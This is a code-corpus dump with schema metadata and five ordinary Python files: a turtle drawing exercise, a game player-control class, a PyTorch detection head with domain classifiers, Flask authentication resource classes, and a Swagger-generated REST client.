blob_id
stringlengths 40
40
| directory_id
stringlengths 40
40
| path
stringlengths 3
616
| content_id
stringlengths 40
40
| detected_licenses
sequencelengths 0
112
| license_type
stringclasses 2
values | repo_name
stringlengths 5
115
| snapshot_id
stringlengths 40
40
| revision_id
stringlengths 40
40
| branch_name
stringclasses 777
values | visit_date
timestamp[us]date 2015-08-06 10:31:46
2023-09-06 10:44:38
| revision_date
timestamp[us]date 1970-01-01 02:38:32
2037-05-03 13:00:00
| committer_date
timestamp[us]date 1970-01-01 02:38:32
2023-09-06 01:08:06
| github_id
int64 4.92k
681M
⌀ | star_events_count
int64 0
209k
| fork_events_count
int64 0
110k
| gha_license_id
stringclasses 22
values | gha_event_created_at
timestamp[us]date 2012-06-04 01:52:49
2023-09-14 21:59:50
⌀ | gha_created_at
timestamp[us]date 2008-05-22 07:58:19
2023-08-21 12:35:19
⌀ | gha_language
stringclasses 149
values | src_encoding
stringclasses 26
values | language
stringclasses 1
value | is_vendor
bool 2
classes | is_generated
bool 2
classes | length_bytes
int64 3
10.2M
| extension
stringclasses 188
values | content
stringlengths 3
10.2M
| authors
sequencelengths 1
1
| author_id
stringlengths 1
132
|
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b6e2db285793968bc194f0cc1a2912dc59ad5622 | 8cadb441c5734c6dae2ed47419bd1ce5fac69afa | /13-파이썬기초_내장모듈2.py | bf78b99950cb5a27de4d0b30b38bf211c65a305d | [] | no_license | swj8905/Basic_Course_0904 | cf969a14ececacd369377bc9db611b639a4823a0 | 501620bb185851c3638d3b2029cc8259de67d770 | refs/heads/master | 2023-08-01T04:08:51.134526 | 2021-09-12T04:18:50 | 2021-09-12T04:18:50 | 402,959,383 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 114 | py | import turtle as t
t.shape("turtle")
for i in range(3):
t.forward(100)
t.left(120)
t.circle(50)
t.done() | [
"[email protected]"
] | |
5f67ab5c03e5c44dd8eafab1df10221c656733c3 | 3a60b8935f809e300405214a66d949f0042e7e46 | /src/game/logic/player_control/player_control.py | 01107f77ef3e00a355c7b889bb6556490849130a | [] | no_license | stellarlib/centaurus | e71fe5c98b94e8e575d00e32f55ba39fe71799e6 | 896ae73165f3f44dfb87378ef2635d447ccbccae | refs/heads/master | 2020-08-29T00:02:47.294370 | 2020-07-06T20:06:02 | 2020-07-06T20:06:02 | 217,860,282 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,929 | py | from .standard_control import StandardControl
from .jump_control import JumpControl
from .ranged_control import RangedControl
from .charge_control import ChargeControl
from .action_cost import *
class PlayerControl(object):
STD = 0
RANGED = 1
JUMP = 2
CHARGE = 3
str_to_enum = {
'std': STD,
'ranged': RANGED,
'jump': JUMP,
'charge': CHARGE,
}
action_cost = {
STD: MOVE_COST,
RANGED: RANGED_COST,
JUMP: JUMP_COST,
CHARGE: CHARGE_COST
}
def __init__(self, logic):
self.game = logic.game
self.logic = logic
cls = PlayerControl
self.mode = cls.STD
self.controls = {
cls.STD: StandardControl(self),
cls.RANGED: RangedControl(self),
cls.JUMP: JumpControl(self),
cls.CHARGE: ChargeControl(self)
}
self._player_turn = True
self._animating = False
@property
def player(self):
return self.logic.player
@property
def active(self):
return self._player_turn and not self._animating
@property
def button_map(self):
return self.game.buttons
#####################
# Routing input #
#################
def switch_mode(self, mode_name):
# this models the panel of buttons where the player toggles between action types
cls = PlayerControl
mode = cls.str_to_enum[mode_name]
if self.mode == mode:
self.mode = cls.STD
#print('switched to standard mode')
self.reset_mode_panel()
else:
cost = cls.action_cost[mode]
if cost > self.player.actions:
#print("can't switch to ", mode_name, " mode - insufficient player actions")
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
else:
self.mode = mode
self.controls[self.mode].init_mode()
# print('switched to ', mode_name, ' mode')
self.reset_mode_panel()
if mode_name != 'std':
button = self.button_map.get_button_by_id(mode_name)
button.button_down()
def reset_mode_panel(self):
[button.button_up() for button in self.button_map.get_button_group('action_mode')]
def handle_click(self, pos):
if self.active:
self.controls[self.mode].handle_click(pos)
def manual_switch_mode(self, mode_name):
if self.active:
self.switch_mode(mode_name)
else:
button = self.button_map.get_button_by_id(mode_name)
button.rumble()
def manual_turn_end(self):
if self.active:
self.rest()
button = self.button_map.get_button_by_id('skip')
button.button_down()
def start_animating(self):
self._animating = True
def end_animating(self):
self._animating = False
##########################################################
# Player controls
####################
def move_player(self, pos):
def resolve_func():
self.spend_action(MOVE_COST)
self.end_animating()
self.start_animating()
self.player.start_move(pos, resolve_func)
def player_exits_level(self, pos):
def resolve_func():
self.end_animating()
self.player.travel_component.travel_to_next_level(pos)
# get next level according to pos
# get the new player pos on that level
# start the new level, put player in new pos
# refresh the turn so it is player start turn, full AP
self.start_animating()
self.player.start_exit_move(pos, resolve_func)
def jump_player(self, pos):
def resolve_func():
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump(pos, resolve_func)
def player_jump_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
def resolve_func():
self.player.melee_attack(foe)
self.spend_action(JUMP_COST)
self.end_animating()
self.start_animating()
self.player.start_jump_attack(pos, resolve_func)
def player_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(MELEE_COST)
self.end_animating()
self.start_animating()
self.player.start_melee_attack(foe, resolve_func)
def player_ranged_attacks(self, pos):
foe = self.logic.get_actor_at(pos)
assert foe != self.player
def resolve_func():
self.spend_action(RANGED_COST)
self.end_animating()
self.player.start_ranged_attack(pos, resolve_func)
def charge_player(self, charge_path):
def resolve_func():
self.spend_action(CHARGE_COST)
self.end_animating()
self.start_animating()
self.player.start_charge(charge_path, resolve_func)
###################################################
# Game Logic #
##############
def spend_action(self, x):
self.switch_mode('std')
assert x <= self.player.actions
self.player.spend_actions(x)
if self.player.actions == 0:
self.end_turn()
def start_player_turn(self):
self._player_turn = True
self.set_up_turn()
def set_up_turn(self):
self.player.restore(2)
def tear_down_turn(self):
print('player turn over')
self.logic.start_ai_turn()
def end_turn(self):
self.tear_down_turn()
self._player_turn = False
def rest(self):
self.player.restore(1)
self.end_turn()
| [
"[email protected]"
] | |
5c48292c1a0e15ded45f817f64d7dc0f5106c3a5 | 7dfabdddeb5b8f1628e445cdb6d536958c8bc85b | /pcdet/models/dense_heads/anchor_head_fuse_context_fpn.py | d59a820290723d6120f227037cd95e972f181593 | [
"Apache-2.0"
] | permissive | vehxianfish/SRDAN_Open | d6ba16ebc201c9651fac16bc30f57dc3a740041f | 47c1bd9d2369d8e486b18a7aea220af7324c9011 | refs/heads/master | 2023-08-15T10:36:56.483018 | 2021-09-25T03:35:53 | 2021-09-25T03:35:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 15,507 | py | import numpy as np
import torch
import torch.nn as nn
from .anchor_head_template import AnchorHeadTemplate
class GradReverse(torch.autograd.Function):
def __init__(self, lambd):
self.lambd = lambd
def forward(self, x):
return x.view_as(x)
def backward(self, grad_output):
return (grad_output * self.lambd)
def grad_reverse(x, lambd):
return GradReverse(lambd)(x)
class AnchorHeadFuseContextFPN(AnchorHeadTemplate):
def __init__(self, model_cfg, input_channels, num_class, class_names, grid_size, point_cloud_range, predict_boxes_when_training=True, nusc=False, input_channels_fpn=None, num_fpn_up=0, num_fpn_downup=0, fpn_layers=[], **kwargs):
super().__init__(
model_cfg=model_cfg, num_class=num_class, class_names=class_names, grid_size=grid_size, point_cloud_range=point_cloud_range,
predict_boxes_when_training=predict_boxes_when_training, nusc=nusc,num_fpn_up=num_fpn_up, num_fpn_downup=num_fpn_downup, fpn_layers=fpn_layers
)
self.num_anchors_per_location = sum(self.num_anchors_per_location)
self.input_channels_fpn = input_channels_fpn
self.context_num = self.num_fpn_up + self.num_fpn_downup
if self.num_fpn_downup > 0:
self.context_num += 1
#256 512
self.context_num += 2 # point context 256*2=512
# print("self.context_num", self.context_num)
###################
if not self.fpn_only:
self.conv_cls = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.num_class,
kernel_size=1
)
self.conv_box = nn.Conv2d(
input_channels+self.context_num*256, self.num_anchors_per_location * self.box_coder.code_size,
kernel_size=1
)
######## FPN #########
self.conv_cls_fpn = nn.ModuleDict()
self.conv_box_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.num_anchors_per_location_fpn[layer] = sum(self.num_anchors_per_location_fpn[layer]) # 2, 7
self.conv_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.num_class,
kernel_size=1
)# 512 -> 2
self.conv_box_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256, self.num_anchors_per_location_fpn[layer] * self.box_coder.code_size,
kernel_size=1
)# 512 -> 14
######### dir cls #########
if self.model_cfg.get('USE_DIRECTION_CLASSIFIER', None) is not None:
if not self.fpn_only:
self.conv_dir_cls = nn.Conv2d(
input_channels+self.context_num*256,
self.num_anchors_per_location * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
self.conv_dir_cls_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = nn.Conv2d(
self.input_channels_fpn[layer]+self.context_num*256,
self.num_anchors_per_location_fpn[layer] * self.model_cfg.NUM_DIR_BINS,
kernel_size=1
)
else:
self.conv_dir_cls = None
for layer in self.fpn_layers:
self.conv_dir_cls_fpn[layer] = None
self.num_keypoints = 2048#self.model_cfg.NUM_KEYPOINTS
self.point_fc = nn.Sequential(nn.Linear(self.num_keypoints, 512), nn.ReLU(True), nn.Dropout())
# print("USE_DOMAIN_CLASSIFIER", self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None))
if self.model_cfg.get('USE_DOMAIN_CLASSIFIER', None):
if not self.fpn_only:
self.domain_pool = nn.AdaptiveAvgPool2d(1)
self.domain_classifier = nn.Sequential(nn.Linear(input_channels+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
self.domain_pool_fpn = nn.ModuleDict()
self.domain_classifier_fpn = nn.ModuleDict()
for layer in self.fpn_layers:
self.domain_pool_fpn[layer] = nn.AdaptiveAvgPool2d(1)
self.domain_classifier_fpn[layer] = nn.Sequential(nn.Linear(self.input_channels_fpn[layer]+512, 1024),
nn.ReLU(True), nn.Dropout(),
nn.Linear(1024, 256), nn.ReLU(True),
nn.Dropout(), nn.Linear(256, 1))
# print(f"self.input_channels_fpn[{layer}]+512", self.input_channels_fpn[layer]+512)
#256
self.init_weights()
def init_weights(self):
pi = 0.01
if not self.fpn_only:
nn.init.constant_(self.conv_cls.bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box.weight, mean=0, std=0.001)
for layer in self.fpn_layers:
nn.init.constant_(self.conv_cls_fpn[layer].bias, -np.log((1 - pi) / pi))
nn.init.normal_(self.conv_box_fpn[layer].weight, mean=0, std=0.001)
def forward(self, data_dict):
# print("spatial_features_2d", spatial_features_2d.shape) 126
t_mode = data_dict['t_mode']
l = data_dict['l']
if t_mode == 'dom_img_src':
dom_src = True
elif t_mode == 'dom_img_tgt':
dom_src = False
else:
dom_src = None
if 'pseudo' in t_mode:
pseudo = True
else:
pseudo = False
spatial_features_2d = data_dict['spatial_features_2d']
point_features_2d = data_dict['point_features']
# print("spatial_features_2d", spatial_features_2d.shape) # 2,512,126,126
# print("point_features_2d", point_features_2d.shape) # 2,2048
point_features_avg = torch.mean(point_features_2d, -1)
# print("point_features_avg", point_features_avg.shape)
batch_point_features = point_features_avg.view(-1, self.num_keypoints)
x_pool_point = self.point_fc(batch_point_features)
################# DOM #################
if 'dom_img' in t_mode and not self.fpn_only:
x_pool = self.domain_pool(spatial_features_2d).view(spatial_features_2d.size(0), -1)
x_pool_joint = torch.cat((x_pool, x_pool_point),dim=-1)
x_reverse = grad_reverse(x_pool_joint, l*-1)
dom_head_context = self.domain_classifier[:-2](x_reverse).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict['dom_head_context'] = dom_head_context
dom_img_preds = self.domain_classifier[-2:](dom_head_context).squeeze(-1)
self.forward_ret_dict['dom_img_preds'] = dom_img_preds
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo
)
self.forward_ret_dict.update(targets_dict_dom)
##################### DOM FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
if 'dom_img' in t_mode:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
x_pool_fpn = self.domain_pool_fpn[layer](spatial_features_2d_fpn).view(spatial_features_2d_fpn.size(0), -1)
x_pool_joint_fpn = torch.cat((x_pool_fpn, x_pool_point),dim=-1)
x_reverse_fpn = grad_reverse(x_pool_joint_fpn, l*-1)
dom_head_context_fpn = self.domain_classifier_fpn[layer][:-2](x_reverse_fpn).squeeze(-1)
if 'dom_img_det' in t_mode:
data_dict[f'dom_head_context_fpn{layer}'] = dom_head_context_fpn
dom_img_preds_fpn = self.domain_classifier_fpn[layer][-2:](dom_head_context_fpn).squeeze(-1)
self.forward_ret_dict[f'dom_img_preds_fpn{layer}'] = dom_img_preds_fpn
if self.training:
targets_dict_dom = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
dom_src=dom_src,
pseudo=pseudo,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_dom)
########## CLS ################
if 'dom_img_det' in t_mode:
dom_point_context = data_dict['dom_point_context']
dom_head_context_fpn = []
for layer in self.fpn_layers:
dom_head_context_fpn.append(data_dict[f'dom_head_context_fpn{layer}'])
dom_head_context_all = torch.cat(dom_head_context_fpn, dim=1)
if not self.fpn_only:
dom_head_context = data_dict['dom_head_context']
dom_head_context_all = torch.cat((dom_head_context_all, dom_head_context, dom_point_context), dim=1)
dom_head_context_all_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d.shape[-2],spatial_features_2d.shape[-1])
# combine with context
spatial_features_2d_context = torch.cat((spatial_features_2d, dom_head_context_all_reshape), dim=1)
cls_preds = self.conv_cls(spatial_features_2d_context)
box_preds = self.conv_box(spatial_features_2d_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds", cls_preds.shape) # 126, 126, 2
# print("box_preds", box_preds.shape) # 126, 126, 14
self.forward_ret_dict['cls_preds'] = cls_preds
self.forward_ret_dict['box_preds'] = box_preds
if self.conv_dir_cls is not None:
dir_cls_preds = self.conv_dir_cls(spatial_features_2d_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict['dir_cls_preds'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights
)
self.forward_ret_dict.update(targets_dict)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds
)
data_dict['batch_cls_preds'] = batch_cls_preds
data_dict['batch_box_preds'] = batch_box_preds
data_dict['cls_preds_normalized'] = False
else:
dom_head_context_all = torch.cat((dom_head_context_all, dom_point_context), dim=1)
# print("batch_cls_preds", batch_cls_preds)
# print("batch_box_preds", batch_box_preds)
# print("data_dict", data_dict['batch_cls_preds'])
##################### CLS FPN #####################
if self.num_fpn_up + self.num_fpn_downup > 0:
# print("fpn")
for layer in self.fpn_layers:
spatial_features_2d_fpn = data_dict[f'spatial_features_2d_fpn{layer}']
# combine with context
dom_head_context_all_fpn_reshape = dom_head_context_all.unsqueeze(-1).unsqueeze(-1).repeat(1,1,spatial_features_2d_fpn.shape[-1],spatial_features_2d_fpn.shape[-1])
# combine with context
spatial_features_2d_fpn_context = torch.cat((spatial_features_2d_fpn, dom_head_context_all_fpn_reshape), dim=1)
cls_preds = self.conv_cls_fpn[layer](spatial_features_2d_fpn_context)
box_preds = self.conv_box_fpn[layer](spatial_features_2d_fpn_context)
cls_preds = cls_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
box_preds = box_preds.permute(0, 2, 3, 1).contiguous() # [N, H, W, C]
# print("cls_preds2", cls_preds.shape) # 1, 252, 252, 2
# print("box_preds2", box_preds.shape) # 1, 252, 252, 14
self.forward_ret_dict[f'cls_preds_fpn{layer}'] = cls_preds
self.forward_ret_dict[f'box_preds_fpn{layer}'] = box_preds
if self.conv_dir_cls_fpn[layer] is not None:
dir_cls_preds = self.conv_dir_cls_fpn[layer](spatial_features_2d_fpn_context)
dir_cls_preds = dir_cls_preds.permute(0, 2, 3, 1).contiguous()
self.forward_ret_dict[f'dir_cls_preds_fpn{layer}'] = dir_cls_preds
else:
dir_cls_preds = None
if self.training:
if pseudo:
pseudo_weights = data_dict['pseudo_weights']
else:
pseudo_weights = None
targets_dict_fpn = self.assign_targets(
gt_boxes=data_dict['gt_boxes'],
pseudo=pseudo,
pseudo_weights=pseudo_weights,
fpn_layer=layer
)
self.forward_ret_dict.update(targets_dict_fpn)
if not self.training or self.predict_boxes_when_training:
batch_cls_preds, batch_box_preds = self.generate_predicted_boxes(
batch_size=data_dict['batch_size'],
cls_preds=cls_preds, box_preds=box_preds, dir_cls_preds=dir_cls_preds,
fpn_layer=layer
)
data_dict[f'batch_cls_preds_fpn{layer}'] = batch_cls_preds
data_dict[f'batch_box_preds_fpn{layer}'] = batch_box_preds
data_dict[f'cls_preds_normalized_fpn{layer}'] = False
# print("data_dict fpn", data_dict[f'batch_cls_preds_fpn{layer}'])
# print("self.forward_ret_dict", self.forward_ret_dict)
return data_dict
| [
"[email protected]"
] | |
884cc588e8613418d6e38335716aadf8320bf7d1 | f1ad2ff0061f67540ae0723a65c6e1238e9ca77f | /brainminer/base/api.py | 9ab5865150d1a9442943b8b3293af060688cb8c7 | [] | no_license | rbrecheisen/brainminer | efb89b0d804196a7875fadd3491a9cb7e6cb0428 | 2f5d7bd53ba4761af1f67fa7bd16e2c6724feb7d | refs/heads/master | 2021-01-20T19:08:42.447425 | 2017-06-22T08:28:57 | 2017-06-22T08:28:57 | 34,522,617 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,737 | py | from flask import g, Response
from flask_restful import Resource, HTTPException, abort
from brainminer.auth.exceptions import (
MissingAuthorizationHeaderException, UserNotFoundException, UserNotActiveException, InvalidPasswordException,
SecretKeyNotFoundException, SecretKeyInvalidException, TokenDecodingFailedException, PermissionDeniedException,
UserNotSuperUserException, UserNotAdminException)
from brainminer.auth.authentication import check_login, check_token
from brainminer.auth.permissions import has_permission, check_permission, check_admin, check_superuser
# ----------------------------------------------------------------------------------------------------------------------
class BaseResource(Resource):
# def dispatch_request(self, *args, **kwargs):
#
# code = 400
#
# try:
# return super(BaseResource, self).dispatch_request(*args, **kwargs)
# except HTTPException as e:
# message = e.data['message']
# code = e.code
# except Exception as e:
# message = e.message
#
# if message is not None:
# print('[ERROR] {}.dispatch_request() {}'.format(self.__class__.__name__, message))
# abort(code, message=message)
@staticmethod
def config():
return g.config
@staticmethod
def db_session():
return g.db_session
@staticmethod
def current_user():
return g.current_user
# ----------------------------------------------------------------------------------------------------------------------
class HtmlResource(BaseResource):
@staticmethod
def output_html(data, code, headers=None):
resp = Response(data, mimetype='text/html', headers=headers)
resp.status_code = code
return resp
# ----------------------------------------------------------------------------------------------------------------------
class LoginProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_login()
except MissingAuthorizationHeaderException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
except InvalidPasswordException as e:
message = e.message
if message is not None:
print('[ERROR] LoginProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(LoginProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class TokenProtectedResource(BaseResource):
def dispatch_request(self, *args, **kwargs):
message = None
try:
check_token()
except MissingAuthorizationHeaderException as e:
message = e.message
except SecretKeyNotFoundException as e:
message = e.message
except SecretKeyInvalidException as e:
message = e.message
except TokenDecodingFailedException as e:
message = e.message
except UserNotFoundException as e:
message = e.message
except UserNotActiveException as e:
message = e.message
if message is not None:
print('[ERROR] TokenProtectedResource.dispatch_request() {}'.format(message))
abort(403, message=message)
return super(TokenProtectedResource, self).dispatch_request(*args, **kwargs)
# ----------------------------------------------------------------------------------------------------------------------
class PermissionProtectedResource(TokenProtectedResource):
def check_admin(self):
try:
check_superuser(self.current_user())
except UserNotSuperUserException:
try:
check_admin(self.current_user())
except UserNotAdminException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def check_permission(self, permission):
try:
check_permission(self.current_user(), permission)
except PermissionDeniedException as e:
print('[ERROR] {}.check_permission() {}'.format(self.__class__.__name__, e.message))
abort(403, message=e.message)
def has_permission(self, permission):
return has_permission(self.current_user(), permission)
| [
"[email protected]"
] | |
b6bcce36c244e1dcbe8b1d8f45d74d97147ca717 | 8a4a4cab76ddf1b19a017c3e5c765caf9a5fe3cc | /swagger_client/rest.py | 25b9436f7d19c7a00f89c6444071a08bfa2dbbb2 | [] | no_license | ibuler/testsdk | fa724ff129e2a6144c05b8330cd4014c8bfb9a58 | 015bc6ca7da64180a2a11756a4e7cce733aca806 | refs/heads/master | 2020-06-23T09:02:50.322517 | 2019-07-25T05:51:26 | 2019-07-25T05:51:26 | 198,577,933 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 13,160 | py | # coding: utf-8
"""
Jumpserver API Docs
Jumpserver Restful api docs # noqa: E501
OpenAPI spec version: v1
Contact: [email protected]
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import io
import json
import logging
import re
import ssl
import certifi
# python 2 and python 3 compatibility library
import six
from six.moves.urllib.parse import urlencode
try:
import urllib3
except ImportError:
raise ImportError('Swagger python client requires urllib3.')
logger = logging.getLogger(__name__)
class RESTResponse(io.IOBase):
def __init__(self, resp):
self.urllib3_response = resp
self.status = resp.status
self.reason = resp.reason
self.data = resp.data
def getheaders(self):
"""Returns a dictionary of the response headers."""
return self.urllib3_response.getheaders()
def getheader(self, name, default=None):
"""Returns a given response header."""
return self.urllib3_response.getheader(name, default)
class RESTClientObject(object):
def __init__(self, configuration, pools_size=4, maxsize=None):
# urllib3.PoolManager will pass all kw parameters to connectionpool
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/poolmanager.py#L75 # noqa: E501
# https://github.com/shazow/urllib3/blob/f9409436f83aeb79fbaf090181cd81b784f1b8ce/urllib3/connectionpool.py#L680 # noqa: E501
# maxsize is the number of requests to host that are allowed in parallel # noqa: E501
# Custom SSL certificates and client certificates: http://urllib3.readthedocs.io/en/latest/advanced-usage.html # noqa: E501
# cert_reqs
if configuration.verify_ssl:
cert_reqs = ssl.CERT_REQUIRED
else:
cert_reqs = ssl.CERT_NONE
# ca_certs
if configuration.ssl_ca_cert:
ca_certs = configuration.ssl_ca_cert
else:
# if not set certificate file, use Mozilla's root certificates.
ca_certs = certifi.where()
addition_pool_args = {}
if configuration.assert_hostname is not None:
addition_pool_args['assert_hostname'] = configuration.assert_hostname # noqa: E501
if maxsize is None:
if configuration.connection_pool_maxsize is not None:
maxsize = configuration.connection_pool_maxsize
else:
maxsize = 4
# https pool manager
if configuration.proxy:
self.pool_manager = urllib3.ProxyManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
proxy_url=configuration.proxy,
**addition_pool_args
)
else:
self.pool_manager = urllib3.PoolManager(
num_pools=pools_size,
maxsize=maxsize,
cert_reqs=cert_reqs,
ca_certs=ca_certs,
cert_file=configuration.cert_file,
key_file=configuration.key_file,
**addition_pool_args
)
def request(self, method, url, query_params=None, headers=None,
body=None, post_params=None, _preload_content=True,
_request_timeout=None):
"""Perform requests.
:param method: http request method
:param url: http request url
:param query_params: query parameters in the url
:param headers: http request headers
:param body: request json body, for `application/json`
:param post_params: request post parameters,
`application/x-www-form-urlencoded`
and `multipart/form-data`
:param _preload_content: if False, the urllib3.HTTPResponse object will
be returned without reading/decoding response
data. Default is True.
:param _request_timeout: timeout setting for this request. If one
number provided, it will be total request
timeout. It can also be a pair (tuple) of
(connection, read) timeouts.
"""
method = method.upper()
assert method in ['GET', 'HEAD', 'DELETE', 'POST', 'PUT',
'PATCH', 'OPTIONS']
if post_params and body:
raise ValueError(
"body parameter cannot be used with post_params parameter."
)
post_params = post_params or {}
headers = headers or {}
timeout = None
if _request_timeout:
if isinstance(_request_timeout, (int, ) if six.PY3 else (int, long)): # noqa: E501,F821
timeout = urllib3.Timeout(total=_request_timeout)
elif (isinstance(_request_timeout, tuple) and
len(_request_timeout) == 2):
timeout = urllib3.Timeout(
connect=_request_timeout[0], read=_request_timeout[1])
if 'Content-Type' not in headers:
headers['Content-Type'] = 'application/json'
try:
# For `POST`, `PUT`, `PATCH`, `OPTIONS`, `DELETE`
if method in ['POST', 'PUT', 'PATCH', 'OPTIONS', 'DELETE']:
if query_params:
url += '?' + urlencode(query_params)
if re.search('json', headers['Content-Type'], re.IGNORECASE):
request_body = None
if body is not None:
request_body = json.dumps(body)
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'application/x-www-form-urlencoded': # noqa: E501
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=False,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
elif headers['Content-Type'] == 'multipart/form-data':
# must del headers['Content-Type'], or the correct
# Content-Type which generated by urllib3 will be
# overwritten.
del headers['Content-Type']
r = self.pool_manager.request(
method, url,
fields=post_params,
encode_multipart=True,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
# Pass a `string` parameter directly in the body to support
# other content types than Json when `body` argument is
# provided in serialized form
elif isinstance(body, str):
request_body = body
r = self.pool_manager.request(
method, url,
body=request_body,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
else:
# Cannot generate the request from given parameters
msg = """Cannot prepare a request message for provided
arguments. Please check that your arguments match
declared content type."""
raise ApiException(status=0, reason=msg)
# For `GET`, `HEAD`
else:
r = self.pool_manager.request(method, url,
fields=query_params,
preload_content=_preload_content,
timeout=timeout,
headers=headers)
except urllib3.exceptions.SSLError as e:
msg = "{0}\n{1}".format(type(e).__name__, str(e))
raise ApiException(status=0, reason=msg)
if _preload_content:
r = RESTResponse(r)
# In the python 3, the response.data is bytes.
# we need to decode it to string.
if six.PY3:
r.data = r.data.decode('utf8')
# log response body
logger.debug("response body: %s", r.data)
if not 200 <= r.status <= 299:
raise ApiException(http_resp=r)
return r
def GET(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("GET", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def HEAD(self, url, headers=None, query_params=None, _preload_content=True,
_request_timeout=None):
return self.request("HEAD", url,
headers=headers,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
query_params=query_params)
def OPTIONS(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("OPTIONS", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def DELETE(self, url, headers=None, query_params=None, body=None,
_preload_content=True, _request_timeout=None):
return self.request("DELETE", url,
headers=headers,
query_params=query_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def POST(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("POST", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PUT(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PUT", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
def PATCH(self, url, headers=None, query_params=None, post_params=None,
body=None, _preload_content=True, _request_timeout=None):
return self.request("PATCH", url,
headers=headers,
query_params=query_params,
post_params=post_params,
_preload_content=_preload_content,
_request_timeout=_request_timeout,
body=body)
class ApiException(Exception):
def __init__(self, status=None, reason=None, http_resp=None):
if http_resp:
self.status = http_resp.status
self.reason = http_resp.reason
self.body = http_resp.data
self.headers = http_resp.getheaders()
else:
self.status = status
self.reason = reason
self.body = None
self.headers = None
def __str__(self):
"""Custom error messages for exception"""
error_message = "({0})\n"\
"Reason: {1}\n".format(self.status, self.reason)
if self.headers:
error_message += "HTTP response headers: {0}\n".format(
self.headers)
if self.body:
error_message += "HTTP response body: {0}\n".format(self.body)
return error_message
| [
"[email protected]"
] | |
